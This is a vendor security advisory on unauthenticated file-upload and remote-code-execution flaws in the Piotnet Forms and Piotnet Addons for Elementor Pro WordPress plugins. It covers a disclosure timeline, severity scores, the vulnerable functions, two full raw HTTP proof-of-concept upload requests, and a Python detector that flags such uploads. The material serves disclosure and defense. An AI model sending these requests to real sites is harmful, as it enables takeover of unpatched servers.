Recently, the Imunify360 team discovered high-severity vulnerabilities in the Piotnet Forms Free/Pro and Piotnet Addons for Elementor Pro plugins. Sergey Brazhnik, Security Analyst from the Imunify360 Web Protection Team, conducted a detailed analysis of the Piotnet Forms and Addons vulnerabilities. Keep on reading to find out more about the following:
On July 7, 2021, the Imunify360 Web Protection team started the responsible disclosure process for Unauthenticated File Upload and Remote Code Execution vulnerabilities discovered in Piotnet Forms Free/Pro and Piotnet Addons for Elementor Pro plugins. An attacker could potentially upload malicious files to the plugins upload directory and execute the uploaded scripts.
Naturally, Imunify360 customers were protected from these vulnerabilities and all initial exploitation attempts were blocked by Imunify360.
The Piotnet developers were provided with a detailed report on July 7, 2021, followed by a PoC and recommendations on August 25, 2021. Since there were no updates from the developers, the WordPress.org plugins team was informed that a vulnerable version of the free plugin was available on the https://wordpress.org/plugins/piotnetforms/ marketplace. The WordPress.org team temporarily blocked the plugin from public access on September 27, 2021; as a result, the new 1.0.23 version of Piotnet Forms Free was released on October 1, 2021.
Finally, on October 13, 2021, Piotnet developers released patched versions of Piotnet Forms Pro (1.1.14) and Piotnet Addons For Elementor Pro (6.4.12).
Description: Unauthenticated File Upload and RCE in Piotnet Forms
Affected Plugin: Piotnet Forms
Affected Versions: <= 1.0.22
CVE ID: pending
CVSS Score: 9.8 (Critical)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Fully Patched Version: 1.0.23
Description: Unauthenticated File Upload and RCE in Piotnet Forms Pro
Affected Plugin: Piotnet Forms Pro
Affected Versions: <= 1.1.13
CVE ID: pending
CVSS Score: 9.8 (Critical)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Fully Patched Version: 1.1.14
For the Piotnet Forms plugins, both Free and Pro versions, the vulnerable function is:
piotnetforms_ajax_form_builder
Vulnerable file:
inc/forms/ajax-form-builder.php
The function is reachable by non-authenticated users:
Furthermore, there is no validation of the parameters the function requires, such as post_id and form_id; for an attack to succeed, these parameters merely need to be present in the request.
Next, the function's code doesn't check the extension of the uploaded files, which makes it possible to upload files with arbitrary extensions and then execute them.
PoC:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: vuln_domain.com
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=--------205816383
Content-Length: 645
Origin: http://vuln_domain.com
Connection: close

----------205816383
Content-Disposition: form-data; name="action"

piotnetforms_ajax_form_builder
----------205816383
Content-Disposition: form-data; name="post_id"

11111
----------205816383
Content-Disposition: form-data; name="form_id"

d253bdb1
----------205816383
Content-Disposition: form-data; name="fields"

[]
----------205816383
Content-Disposition: form-data; name="referrer"

http://domain.com/?page_id=2
----------205816383
Content-Disposition: form-data; name="file[]"; filename="file.php"
Content-Type: application/octet-stream

<?php echo("PoC for vulnerability is confirmed"); ?>
----------205816383--
Description: Unauthenticated File Upload and RCE in Piotnet Addons for Elementor Pro
Affected Plugin: Piotnet Addons for Elementor Pro
Affected Versions: <= 6.4.11
CVE ID: pending
CVSS Score: 9.8 (Critical)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Fully Patched Version: 6.4.12
For Piotnet Addons For Elementor Pro, the case is quite similar, except that the function name is pafe_ajax_form_builder and the uploads directory is /wp-content/uploads/piotnet-addons-for-elementor/; the rest of the code is identical. The free version available on https://wordpress.org/plugins/piotnet-addons-for-elementor/ is NOT affected, since it doesn't contain the vulnerable functionality.
PoC:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: vuln_domain.com
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=--------205816383
Content-Length: 645
Origin: http://vuln_domain.com
Connection: close

----------205816383
Content-Disposition: form-data; name="action"

pafe_ajax_form_builder
----------205816383
Content-Disposition: form-data; name="post_id"

11111
----------205816383
Content-Disposition: form-data; name="form_id"

d253bdb1
----------205816383
Content-Disposition: form-data; name="fields"

[]
----------205816383
Content-Disposition: form-data; name="referrer"

http://domain.com/?page_id=2
----------205816383
Content-Disposition: form-data; name="file[]"; filename="file.php"
Content-Type: application/octet-stream

<?php echo("PoC for vulnerability is confirmed"); ?>
----------205816383--
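Both PoCs share one shape: an unauthenticated multipart POST to admin-ajax.php whose action is one of the two form-builder handlers and whose file[] part carries a PHP filename. The following Python is an added detection example (not Imunify360's or Piotnet's code) that parses such a raw request the way a WAF or an incident responder replaying captured traffic would and flags that combination; the example.test host, the executable-extension list and the build_sample helper are constructed assumptions.

```python
"""Added example (not Imunify360/Piotnet code): flag Piotnet form-builder uploads."""
import email
from email import policy

# AJAX actions named in the advisory (Forms Free/Pro and Addons for Elementor Pro).
VULN_ACTIONS = {"piotnetforms_ajax_form_builder", "pafe_ajax_form_builder"}
# Extensions a typical PHP handler configuration executes (assumed list).
EXEC_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}


def inspect_request(raw: bytes) -> dict:
    """Parse a raw HTTP/1.1 request; return action, upload names and a verdict."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path = lines[0].split(" ")[:2]
    headers = {k.strip().lower(): v.strip()
               for k, _, v in (line.partition(":") for line in lines[1:])}
    ctype = headers.get("content-type", "")
    result = {"action": None, "uploads": [], "suspicious": False}
    if (method != "POST" or path.split("?")[0] != "/wp-admin/admin-ajax.php"
            or not ctype.startswith("multipart/form-data")):
        return result
    # Prepend the Content-Type so the stdlib MIME parser can walk the parts.
    msg = email.message_from_bytes(
        f"Content-Type: {ctype}\r\n\r\n".encode() + body, policy=policy.default)
    for part in msg.iter_parts():
        name = part.get_param("name", header="content-disposition")
        if name == "action":
            result["action"] = part.get_payload(decode=True).decode().strip()
        elif part.get_filename():
            result["uploads"].append(part.get_filename())
    risky = any("." in f and f.rsplit(".", 1)[1].lower() in EXEC_EXTS
                for f in result["uploads"])
    result["suspicious"] = result["action"] in VULN_ACTIONS and risky
    return result


def build_sample(action: str, filename: str) -> bytes:
    """Constructed request mirroring the advisory's PoC layout (not real traffic)."""
    b = "--------205816383"
    fields = [("action", action), ("post_id", "11111"), ("form_id", "d253bdb1"),
              ("fields", "[]")]
    body = "".join(f'--{b}\r\nContent-Disposition: form-data; name="{n}"\r\n\r\n{v}\r\n'
                   for n, v in fields)
    body += (f'--{b}\r\nContent-Disposition: form-data; name="file[]"; '
             f'filename="{filename}"\r\nContent-Type: application/octet-stream\r\n'
             f'\r\n(constructed upload body)\r\n--{b}--\r\n')
    head = ("POST /wp-admin/admin-ajax.php HTTP/1.1\r\nHost: example.test\r\n"
            f"Content-Type: multipart/form-data; boundary={b}\r\n"
            f"Content-Length: {len(body)}\r\n\r\n")
    return head.encode() + body.encode()
```

Calling inspect_request(build_sample("pafe_ajax_form_builder", "file.php")) returns a result with suspicious set to True, while a benign document name such as resume.pdf under the same action is reported but not flagged.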
To protect your servers from exploitation of these vulnerabilities, we strongly recommend:
Take your web hosting security to the next level with the Imunify360 security suite. Imunify360 is a complete security suite with all components working together to keep your servers safe and running while you focus on other business tasks. Imunify360 combines Antivirus for Linux Server, Firewall, WAF, PHP Security Layer, Patch Management and Domain Reputation with an easy UI and advanced automation. Try Imunify360 free for 14 days and see results in just one week.